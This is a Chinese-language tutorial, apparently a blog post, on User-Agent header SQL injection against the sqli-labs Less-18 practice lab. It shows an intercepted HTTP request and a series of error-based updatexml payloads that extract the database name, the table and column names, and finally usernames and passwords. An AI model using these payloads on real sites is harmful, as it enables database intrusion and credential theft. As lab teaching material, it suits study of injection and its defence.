useragent 攻击
很多网站都会记录用户的useragent, 这就为注入提供了条件。
工具
FireFox + Burp 或Firefox+hackbar插件。
Burp 是一个修改、重发Http请求的利器。。。
其原理是设置电脑的或浏览器的代理为127.0.0.1:8080,而Burp在这个地址监听,这样浏览器就会先将
请求发送到这个地址,Burp可以选择修改后,再转发出去。达到hack的目的。
步骤
POST /sqli/Less-18/ HTTP/1.1
Host: www.any.com
User-Agent: 122' or updatexml(1,concat(0x7e,(database())),0) or '
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.any.com/sqli/Less-18/
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
uname=admin&passwd=admin&submit=Submit
image.png结果暴露了数据库名。
可以看到方法和SQL注入或Cookie没太多不同,只是注入点不相同。
获取数据库表
User-Agent值设置为
123' or updatexml(0,concat(0x7e,(select unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema='security')),0) or '
image.png获取字段
User-Agent值设置为
123' or updatexml(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' )),0) or '
image.png获取用户信息
User-Agent值设置为
123' or updatexml(0,concat(0x7e,(select group_concat(id,username,password) from security.users )),0) or '
image.png
网友评论